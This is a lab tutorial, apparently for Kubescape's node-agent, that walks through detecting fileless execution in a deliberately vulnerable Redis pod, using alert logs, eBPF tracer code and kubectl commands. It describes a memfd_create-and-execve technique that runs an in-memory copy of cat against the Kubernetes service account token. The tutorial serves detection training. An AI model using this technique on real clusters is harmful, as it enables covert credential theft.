perl with PID 116061","msg":"Unexpected process launched","processtree_depth":"1","time":"2026-03-01T17:14:23Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/proc/self/fd/3","/var/run/secrets/kubernetes.io/serviceaccount/token"],"exec":"/proc/self/fd/3","message":"Unexpected process launched: 3 with PID 116061"},"infectedPID":116061,"severity":1,"timestamp":"2026-03-01T17:14:23.514675324Z","trace":{},"uniqueID":"905a7383968958ff8dd7260602baed47","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"3","commandLine":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token"},"file":{"name":"memfd:pwned","directory":"."}}},"CloudMetadata":null,"RuleID":"R0001","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":116061,"cmdline":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token","comm":"3","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"memfd:pwned"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected process launched: 3 with PID 116061","msg":"Unexpected process launched","processtree_depth":"1","time":"2026-03-01T17:14:23Z"}
{"BaseRuntimeMetadata":{"alertName":"Fileless execution detected","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/proc/self/fd/3","/var/run/secrets/kubernetes.io/serviceaccount/token"],"exec":"/proc/self/fd/3","message":"Fileless execution detected: exec call \"3\" is from a malicious source"},"infectedPID":116061,"severity":8,"timestamp":"2026-03-01T17:14:23.514675324Z","trace":{},"uniqueID":"90e172c0dfb727a19e4b8b39e2b89e9d","identifiers":{"process":{"name":"3","commandLine":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token"},"file":{"name":"memfd:pwned","directory":"."}}},"CloudMetadata":null,"RuleID":"R1005","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":116061,"cmdline":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token","comm":"3","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"memfd:pwned"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Fileless execution detected: exec call \"3\" is from a malicious source","msg":"Fileless execution detected","processtree_depth":"1","time":"2026-03-01T17:14:23Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected service account token access","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","flags":["O_RDONLY"],"message":"Unexpected access to service account token: /run/secrets/kubernetes.io/serviceaccount/..2026_03_01_17_06_29.4186941470/token with flags: O_RDONLY","path":"/run/secrets/kubernetes.io/serviceaccount/..2026_03_01_17_06_29.4186941470/token"},"infectedPID":116061,"severity":5,"timestamp":"2026-03-01T17:14:23.515848016Z","trace":{},"uniqueID":"eccbc87e4b5ce2fe28308fd9f2a7baf3","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"3"},"file":{"name":"token","directory":"/run/secrets/kubernetes.io/serviceaccount/..2026_03_01_17_06_29.4186941470"}}},"CloudMetadata":null,"RuleID":"R0006","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":116061,"cmdline":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token","comm":"3","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"memfd:pwned"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected access to service account token: /run/secrets/kubernetes.io/serviceaccount/..2026_03_01_17_06_29.4186941470/token with flags: 
O_RDONLY","msg":"Unexpected service account token access","processtree_depth":"1","time":"2026-03-01T17:14:23Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: readlink with PID 99476","syscall":"readlink"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:14:40.332453349Z","trace":{},"uniqueID":"7ae8bea4fa0e4bc42167bb3a680f1686","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: readlink with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:14:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: fadvise64 with PID 99476","syscall":"fadvise64"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:14:40.342927946Z","trace":{},"uniqueID":"840a89954c4149cca50949888cfdb6a6","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: fadvise64 with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:14:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: move_pages with PID 99476","syscall":"move_pages"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:14:40.378468605Z","trace":{},"uniqueID":"d5ff80e564058e4b1ce10fecdfb64053","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: move_pages with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:14:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: memfd_create with PID 99476","syscall":"memfd_create"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:14:40.393691896Z","trace":{},"uniqueID":"63e927ab32c6c56d320a6d818cb4bda3","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: memfd_create with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:14:40Z"}

Step 5: Verify the alert

In another terminal (Terminal 3), let's grep for the specific alert that we'll be tracking throughout the dungeon code-base:

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=50 | grep "R1005"

You should see: "Fileless execution detected: exec call \"3\" is from a malicious source" with severity 8, MITRE tactic TA0005, technique T1055.

The gates of the dungeon creak open. Your torch flickers. Nine chambers await. Let us begin the ascent.

Rooms 1-2 -- Kernel Depths & Gadget's Outpost

Room 1: The Kernel Depths

You descend into the deepest chamber. Millions of syscalls echo off the walls. The Kernel processes them all without judgment. A legitimate cat /etc/hosts looks identical to execve("/proc/self/fd/3"). The Kernel does not care.

           userspace (Redis container)
           β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
           β”‚  perl: memfd_create("pwned", 0)  β”‚  ← syscall 319 (x86) / 279 (arm)
           β”‚        write(fd, /bin/cat)       β”‚
           β”‚        execve("/proc/self/fd/3") β”‚  ← this is the event we trace
           β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
  ─────────────────── kernel boundary ───────────────────
                          β”‚
           β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
           β”‚  Linux kernel:                   β”‚
           β”‚  1. memfd_create β†’ returns fd=3  β”‚
           β”‚  2. write β†’ copies binary to fd  β”‚
           β”‚  3. execve β†’ resolves /proc/     β”‚
           β”‚     self/fd/3 β†’ anon inode       β”‚
           β”‚  4. Maps into memory, runs it    β”‚
           β”‚                                  β”‚
           β”‚  Checks: uid/gid permissions βœ“   β”‚
           β”‚  Does NOT check: intent βœ—        β”‚
           β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Two syscalls matter for our (pseudo)-exploit:

  • memfd_create("pwned", 0) --- creates an anonymous RAM-backed file. No filesystem path. Returns fd=3.
  • execve("/proc/self/fd/3", ["cat", "...token..."]) --- replaces the process with the binary in that fd. The kernel resolves it through procfs and executes.

The kernel treats execve("/usr/bin/cat") and execve("/proc/self/fd/3") identically. Both pass permission checks. Neither triggers any alert on its own.

Quest: Fire the syscall

Step 1 β€” create the memfd only (observe the fd number):

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis \
  -o jsonpath='{.items[0].metadata.name}')

kubectl -n redis exec "$REDIS_POD" -- perl -e '
my $n = "bob123";
my $fd = syscall(319, $n, 0);
print "memfd fd=$fd\n";
'

You'll see memfd fd=3 β€” the first free fd after stdin(0), stdout(1), stderr(2). Each kubectl exec spawns a fresh process, so fd=3 is always available.
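If you prefer Go (the node-agent's own language) to Perl, the same experiment can be sketched with a raw syscall, assuming a Linux host. memfdCreate is our own helper, not part of any library; the syscall numbers match the ones shown in the diagram above.

```go
package main

import (
	"fmt"
	"os"
	"runtime"
	"syscall"
	"unsafe"
)

// memfdCreate is our own helper issuing the raw memfd_create syscall:
// number 319 on x86_64, 279 on arm64, matching the perl one-liner above.
func memfdCreate(name string) (int, error) {
	nr := uintptr(319)
	if runtime.GOARCH == "arm64" {
		nr = 279
	}
	p, err := syscall.BytePtrFromString(name)
	if err != nil {
		return -1, err
	}
	fd, _, errno := syscall.Syscall(nr, uintptr(unsafe.Pointer(p)), 0, 0)
	if errno != 0 {
		return -1, errno
	}
	return int(fd), nil
}

func main() {
	fd, err := memfdCreate("pwned")
	if err != nil {
		panic(err)
	}
	// The fd has no filesystem path, only a procfs alias; readlink on the
	// alias reveals the anonymous inode behind it.
	alias := fmt.Sprintf("/proc/self/fd/%d", fd)
	target, _ := os.Readlink(alias)
	fmt.Println(alias, "->", target)
}
```

On a Linux host the readlink target reads like /memfd:pwned (deleted): an anonymous inode rather than a path on disk, which is exactly the tell the later rooms key on.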

Step 2 β€” Inspect the logs and find the syscalls:

Check the node-agent logs again (maybe you still have your second terminal open).

kubectl logs -n kubescape -l app=node-agent -c node-agent | grep "memfd_create"

There is quite a bit of noise, since raw syscalls are hard to filter on their own. What we want to confirm is that the line my $fd = syscall(319, $n, 0); really issued the memfd_create syscall and that the kernel processed it.

You could construct rules directly on the basis of this single syscall, but that would be brittle. You'll see below that the approach taken is slightly different: the syscall must be executed for the pseudo-exploit to work, but the alert rule watches for a more robust tell.

Let's consider the other parts of the fileless exec to understand why.


Room 2: Gadget's Outpost

A green-cloaked ranger waits at the crossroads, eyes closed in concentration. Glowing eBPF threads extend from his fingertips into the kernel. Each thread vibrates when a matching syscall fires.

  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚  node-agent pod  (ns: kubescape)                               β”‚
  β”‚                                                                β”‚
  β”‚  ExecTracer.Start()                                            β”‚
  β”‚       β”‚                                                        β”‚
  β”‚       β–Ό                                                        β”‚
  β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”‚
  β”‚  β”‚ Inspektor Gadget runtime.RunGadget()                    β”‚   β”‚
  β”‚  β”‚                                                         β”‚   β”‚
  β”‚  β”‚  eBPF image: trace_exec:v0.48.1                         β”‚   β”‚
  β”‚  β”‚  Operators:                                             β”‚   β”‚
  β”‚  β”‚    1. kubeManager    ── K8s enrichment (pod, ns, labels)β”‚   β”‚
  β”‚  β”‚    2. ociHandler     ── OCI image handling              β”‚   β”‚
  β”‚  β”‚    3. ExecOperator   ── arg buffer parsing (Room 3)     β”‚   β”‚
  β”‚  β”‚    4. eventOperator  ── our subscription callback       β”‚   β”‚
  β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β”‚
  β”‚                             β”‚ every execve in every container  β”‚
  β”‚                             β–Ό                                  β”‚
  β”‚                     DatasourceEvent{                           β”‚
  β”‚                       exepath: "/proc/self/fd/3"               β”‚
  β”‚                       comm: "3"                                β”‚
  β”‚                       args: "cat /var/run/.../token"           β”‚
  β”‚                       pid: 51120                               β”‚
  β”‚                       timestamp: <nanoseconds>                 β”‚
  β”‚                     }                                          β”‚
  β”‚                             β”‚                                  β”‚
  β”‚                             β–Ό                                  β”‚
  β”‚                     callback() ── filter: retVal > -1          β”‚
  β”‚                             β”‚                                  β”‚
  β”‚                             β–Ό                                  β”‚
  β”‚                     handleEvent() ── enrichEvent()             β”‚
  β”‚                             β”‚                                  β”‚
  β”‚                             β–Ό                                  β”‚
  β”‚                     eventCallback (β†’ OrderedEventQueue)        β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

The ExecTracer loads the trace_exec eBPF gadget into the kernel. From that moment, every execve in every container on the node triggers the probe.

For our fileless exec, we thus focus on the fact that something was executed in a suspicious way, rather than on the syscall. The probe captures:

| Field | Value | How accessed |
| --- | --- | --- |
| exepath | /proc/self/fd/3 or memfd:pwned | GetExePath() |
| comm | 3 (the execved binary name) | GetComm() |
| args | cat /var/run/.../token | GetArgs() |
| proc.pid | 51120 | GetPID() |
| proc.parent.comm | perl | GetPcomm() |
| timestamp_raw | nanosecond boot-time | GetTimestamp() |

Source code -- ExecTracer.Start() loads the eBPF probe

pkg/containerwatcher/v2/tracers/...

func (et *ExecTracer) Start(ctx context.Context) error {
    et.gadgetCtx = gadgetcontext.New(ctx,
        execImageName, 
        gadgetcontext.WithDataOperators(
            et.kubeManager,
            ocihandler.OciHandler,
            NewExecOperator(),
            et.eventOperator(),
        ),
        ...
    )
    go func() {
        params := map[string]string{
            "operator.oci.ebpf.paths":    "true",
            "operator.LocalManager.host": "true",
        }
        err := et.runtime.RunGadget(et.gadgetCtx, nil, params)
        ...
    }()
    return nil
}

If you wanted to use a custom gadget, this is where you would copy the structure and insert your own image. Kubescape has used OCI-based gadgets since November 2025.
Source code -- eventOperator subscribes to the eBPF datasource

pkg/containerwatcher/v2/tracers/exec.go:109-124

func (et *ExecTracer) eventOperator() operators.DataOperator {
    return simple.New(string(utils.ExecveEventType),
        simple.OnInit(func(gadgetCtx operators.GadgetContext) error {
            for _, d := range gadgetCtx.GetDataSources() {
                d.Subscribe(func(source datasource.DataSource, data datasource.Data) error {
                    et.callback(&utils.DatasourceEvent{
                        Datasource: d,
                        Data:       source.DeepCopy(data),
                        EventType:  utils.ExecveEventType,
                    })
                    return nil
                }, opPriority)
            }
            return nil
        }),
    )
}

This is how the data is normalized from a gadget into the rest of the node-agent.

Quest: Watch the probes load

Loading the gadgets into the kernel is a delicate process; loading too many at once can cause various errors. If you are ever missing events, it is worth checking whether any of the gadgets failed to load.

kubectl get pods -n kubescape -l app=node-agent -o wide
kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=200 | grep -i "tracer\|gadget"

Find in the node-agent source code which gadgets are loaded and where they are defined.

solution
{"level":"info","ts":"2026-03-21T14:50:26Z","msg":"Starting procfs tracer before other tracers"}
{"level":"info","ts":"2026-03-21T14:50:26Z","msg":"ProcfsTracer started successfully"}
{"level":"info","ts":"2026-03-21T14:50:56Z","msg":"Started tracer","tracer":"trace_exec","count":1}
{"level":"info","ts":"2026-03-21T14:50:58Z","msg":"Started tracer","tracer":"trace_open","count":2}
{"level":"info","ts":"2026-03-21T14:51:00Z","msg":"Started tracer","tracer":"trace_kmod","count":3}
{"level":"info","ts":"2026-03-21T14:51:02Z","msg":"Started tracer","tracer":"trace_randomx","count":4}
{"level":"info","ts":"2026-03-21T14:51:04Z","msg":"Started tracer","tracer":"trace_bpf","count":5}
{"level":"info","ts":"2026-03-21T14:51:06Z","msg":"Started tracer","tracer":"trace_hardlink","count":6}
{"level":"info","ts":"2026-03-21T14:51:08Z","msg":"Started tracer","tracer":"trace_http","count":7}
{"level":"info","ts":"2026-03-21T14:51:10Z","msg":"Started tracer","tracer":"trace_dns","count":8}
{"level":"info","ts":"2026-03-21T14:51:12Z","msg":"Started tracer","tracer":"trace_unshare","count":9}
{"level":"info","ts":"2026-03-21T14:51:14Z","msg":"Started tracer","tracer":"syscall_tracer","count":10}
{"level":"info","ts":"2026-03-21T14:51:16Z","msg":"Started tracer","tracer":"trace_fork","count":11}
{"level":"info","ts":"2026-03-21T14:51:18Z","msg":"Started tracer","tracer":"trace_capabilities","count":12}
{"level":"info","ts":"2026-03-21T14:51:20Z","msg":"Started tracer","tracer":"trace_symlink","count":13}
{"level":"info","ts":"2026-03-21T14:51:22Z","msg":"Started tracer","tracer":"trace_ssh","count":14}
{"level":"info","ts":"2026-03-21T14:51:24Z","msg":"Started tracer","tracer":"trace_ptrace","count":15}
{"level":"info","ts":"2026-03-21T14:51:26Z","msg":"Using iouring gadget image","image":"ghcr.io/inspektor-gadget/gadget/iouring_old:latest","kernelVersion":"6.1.160","major":6,"minor":1}
{"level":"info","ts":"2026-03-21T14:51:26Z","msg":"Started tracer","tracer":"trace_iouring","count":16}
{"level":"info","ts":"2026-03-21T14:51:28Z","msg":"Started tracer","tracer":"trace_exit","count":17}
{"level":"info","ts":"2026-03-21T14:51:30Z","msg":"Started tracer","tracer":"trace_network","count":18}

Inspector Gadget's threads vibrate. An execve("/proc/self/fd/3") has fired in the Redis container. The eBPF probe captures exepath, PID, args, timestamp. The event flows to the Scribes.


Rooms 3-4 -- Scribe's Chamber & Hall of Time

Room 3: The Scribe's Chamber

Tireless scribes receive raw scrolls from Inspector Gadget --- a jumble of null-terminated bytes --- and translate them into structured records the rest of the dungeon can read.

        eBPF ring buffer                                                ExecOperator
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ args: "cat\0/var/run/secrets/.../token\0" β”‚ ──────────────>  β”‚ args: ["cat", "/var/run/secrets/.../token] β”‚
  β”‚ args_size: 52                             β”‚                  β”‚                                            β”‚
  β”‚ args_count: 2                             β”‚                  β”‚                                            β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
         raw bytes                                                               typed Go struct

The ExecOperator is the scribe for exec events. It reads the raw null-terminated argument buffer from eBPF and splits it into a string slice joined by consts.ArgsSeparator.

For our fileless exec, the raw bytes cat\0/var/run/secrets/kubernetes.io/serviceaccount/token\0 become the args list ["cat", "/var/run/secrets/.../token"].
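That translation step can be sketched in a few lines of Go. parseArgs is our own name for the idea, not the ExecOperator's actual function:

```go
package main

import (
	"fmt"
	"strings"
)

// parseArgs is our own sketch of the Scribe's job: split the raw
// NUL-terminated argument buffer from the eBPF ring buffer into a Go
// string slice. (The real ExecOperator then re-joins the pieces with
// consts.ArgsSeparator before handing them on.)
func parseArgs(raw []byte) []string {
	s := strings.TrimRight(string(raw), "\x00")
	if s == "" {
		return nil
	}
	return strings.Split(s, "\x00")
}

func main() {
	raw := []byte("cat\x00/var/run/secrets/kubernetes.io/serviceaccount/token\x00")
	fmt.Printf("%q\n", parseArgs(raw))
	// ["cat" "/var/run/secrets/kubernetes.io/serviceaccount/token"]
}
```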

The other key field --- exepath --- comes directly from the eBPF probe. No parsing needed.

Source code -- GetExePath() reads exepath from eBPF datasource

pkg/utils/datasource_event.go

